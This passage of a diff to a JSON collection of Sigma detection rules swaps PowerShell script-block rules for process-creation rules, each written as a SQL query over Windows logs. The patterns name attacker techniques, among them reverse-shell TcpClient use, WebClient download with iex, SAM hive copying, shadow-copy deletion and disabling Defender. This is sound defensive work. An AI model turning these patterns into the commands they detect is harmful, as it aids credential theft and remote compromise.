'%Set-VMFirmware%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-VM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_hyper_v_condlet.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsScript", - "id": "9e620995-f2d8-4630-8430-4afd89f77604", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113, Nasreddine Bencherchali", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", - "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Diagnostics" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts that use the same keywords." + "Use of Program Compatibility Troubleshooter Helper" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmimplant.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Detected Windows Software Discovery - PowerShell", - "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "status": "experimental", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", + "status": "test", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administration activities" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_powershell_sam_access.yml" + }, + { + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "status": "test", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ], + "falsepositives": [ + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_software_discovery.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Suspicious New-PSDrive to Admin Share", - "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detect usage of the \"driverquery\" utility. Which can be used to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "status": "experimental", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "Suspicious Scan Loop Network", + "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", "attack.execution", - "attack.t1059.001" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "status": "test", - "description": "Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "Arbitrary MSI Download Via Devinit.EXE", + "id": "90d50722-0483-4065-8e35-57efaadd354d", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_devinit_lolbin_usage.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "title": "Remote Access Tool - ScreenConnect Execution", + "id": "57bff678-25d1-4d6c-8211-8ca106d12053", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Legitimate usage of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'ScreenConnect Service' OR Product = 'ScreenConnect' OR Company = 'ScreenConnect Software'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", - "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "title": "Java Running with Remote Debugging", + "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "status": "test", + "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", + "author": "Florian Roth (Nextron Systems)", 